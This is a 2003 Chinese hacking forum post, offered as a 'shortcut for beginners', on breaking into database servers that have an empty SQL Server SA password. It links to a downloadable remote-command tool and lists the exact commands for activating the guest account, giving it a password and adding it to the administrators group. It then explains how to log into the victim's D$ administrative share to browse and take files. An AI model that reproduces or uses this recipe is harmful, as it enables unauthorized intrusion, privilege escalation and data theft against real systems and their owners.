Board logo

标题: 数据库之入侵捷径 [打印本页]

作者: 久木    时间: 2003-2-20 02:40     标题: 数据库之入侵捷径

LBHIDDEN[0]LBHIDDEN我谈的是,数据库,只供菜鸟参考,高手一律免看,要不就是浪费时间!
首先,我们清楚,一个数据库,他的初级隐蔽的隐患在于 SA空密码,
如果他在存在着 共享,哦!] ,太没有面子了!
这样的话,我们可以利用一个远程的连接工具,利用它的SA空密码
连接他的数据库,如何操作呢?
只要有这样的漏洞,我们可以这样
sq ip  这样就可以了,等待……  /……sq……不是一个命令而是一个编译好的程序\
                            /……程序下载   http://www.Lsky.org/lsky.exe     \
如果出现了  Now type dos command(s) to execute :
的时候,你就高兴吧,已经连接成功,
我们可以在这个时候,开通他的GUEST ,也就是允许GUEST 服务
具体操作呢?
net user guest /active:yes
net user guest index
net localgroup administrators guest /add
记住,一条命令,要连接一回。
这样两个命令,就打开了 他的 GUEST 帐号服务,密码是:index
我们就可以正常登陆了。
怎姆登陆呢?
我刚才说过:“如果他在存在着 共享,哦!] ,太没有面子了!”
利用共享吧,在您的   开始--运行地方
打上  \\IP\\D$                                  /……连接共享……\
等待……   提示    让我们出示密码和用户名
我们刚才已经建立了  guest   
登录吧,就像打开了一个文件夹,继续查序吧,
找到你想要的,和你关心的东西!
其实还可以创建其他的用户名子,也可以其他方式登录,随你所好! [DISABLELBCODE]




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2